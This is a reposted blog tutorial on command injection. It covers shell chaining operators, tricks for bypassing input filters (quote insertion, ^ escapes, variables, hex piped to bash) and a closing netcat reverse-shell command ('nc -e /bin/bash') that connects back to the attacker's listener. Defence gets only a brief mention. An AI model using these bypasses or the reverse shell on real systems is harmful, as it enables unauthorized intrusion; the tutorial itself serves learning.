Remote code/command execution vulnerability learning (1)

Enterprise 2023-07-11 23:56:52 views: null

Remote Code/Command Execution Vulnerability is referred to as RCE and its full name is remote command/code execute.

Remote Command Execution Vulnerability

1. understand

Command injection into the operating system, referred to as command implantation, is a type of injection vulnerability. In the software, due to business needs, some command execution operations, such as ping operations, will be performed. As a result, there is a probability of remote command execution vulnerabilities. Attackers can add additional malicious instruction operations to the original command execution instruction operations of the operating system. That is, implanting malicious instructions on the shell.

In the windows operating system, the command execution is cmd. In the Linux operating system, the command execution is console.

2. Detailed explanation

Cause analysis :

Some special functions of the application program need the command function of the system to execute. If there are no or very limited input restrictions on command functions during the software development process, then malicious injection into the operating system can be achieved by controlling the input content, forming a loophole.

Initial attempt :

It is generally checked by entering specific command keywords or special symbols.

Attack execution means of remote commands :

  1. cmd1;cmd2

(When there is no input restriction on command keywords or special symbols)

Separate the two command instructions with a semicolon.

Under the Linux operating system, the second command will be executed after the first command is executed. In the Windows operating system, the semicolon function is invalid.

From this, it can be concluded what the operating system of the target that needs to be attacked is.

  1. cmd1&cmd2

& is a background operator, it will execute command 1 first, and then put command 1 into the background, regardless of whether command 1 is executed or not, command 2 will be executed.

That is to say, after using &, command 1 can be input casually, because command 2 will be executed, as long as command 2 is the required command.

  1. cmd1||cmd2

|| is an OR operator, first execute command 1 and then execute command 2.

If 1 succeeds, 2 is not executed. If 1 fails, do 2.

  1. cmd1|cmd2

| The result of the previous command is used as the parameter of the next command.

  1. cmd1&&cmd2

&& is an AND operator, first execute 1 and then execute 2, but only execute 2 if 1 succeeds.

Operators just combine our commands to create malicious effects, and the core content is the command itself.

Remote command vulnerability prevention:

Filter key characters for prevention

Prevent and process by restricting the content entered by the user and not running the key content.

Bypass of filtering rules :

There are common workarounds for systems with limited input.

1. Add quotation marks

For example: the whoami command will get the name of the system administrator but is restricted from entering

You can add quotation marks to who"am"i to bypass the restriction input

2. Add ^ symbol

^ is an escape character, which converts the character into the original character, which can destroy the form of the keyword.

For example: the echo command is restricted, you can use e^cho, after escaping, it is still echo, but

It will limit the input to only detect four characters of echo, echo!=e^cho, because e^cho will be regarded as five characters, so the restriction input can be bypassed.

3. Set variables

Enter set a=whoami, (= no spaces on both sides), change a to whoami

Then enter cmd /c %a% to get the administrator name

4. Use semicolons instead of spaces

But semicolons instead of spaces can only be used under windows system. In the Linux system, a semicolon is used to separate two command instructions. Linux generally uses single quotes '' or slashes \ to bypass.

5. Text to hexadecimal

The command instruction can be converted into hexadecimal instead of execution.

For example, convert echo aaa to hexadecimal

On the Linux command line, you can enter echo hexadecimal numbers/xxd -r -p|bash

It can be converted into the original command instruction, and the filter can be bypassed.

After the attack can be performed, about the penetration :

1. Connect the target computer with the port number of your own computer

In the Linux system, listen to a port number in your own command line window

nc -lvnp 8081 listen on 8081

Enter where command-line injection is possible

cmd1&nc -e /bin/bash target IP address 8081

You can query the target computer in the command line window of your computer

For example: Entering whoami will display the administrator name of the target computer

But in docker (another Linux server), you can't use nc -e, you can use bash -i command

Guess you like

Origin blog.csdn.net/love_wgll/article/details/129179893
Recommended
Ranking
Offensive and defensive world re master zone Mysterious WP
How to draw a functional flowchart?
Process Fundamentals of SAP SD Overview
When InstalMgr1.52 installation is not responding
Oracle stored procedure with parameters
Arrays, loops, condition 23
[ChatGPT]ChatGPT is free, no need to circumvent the firewall! ? ——The equipment you need
WiFi-based CSI and RSS hybrid fingerprint indoor positioning
Get through Web2 and Web3 Okey Cloud Chain uses data to build a bridge
QT,UDP communication
Daily
More
2024-09-19(0)
2024-09-18(0)
2024-09-17(0)
2024-09-16(0)
2024-09-15(0)
2024-09-14(0)
2024-09-13(0)
2024-09-12(0)
2024-09-11(0)
2024-09-10(0)

Code World

© 2018 codetd.com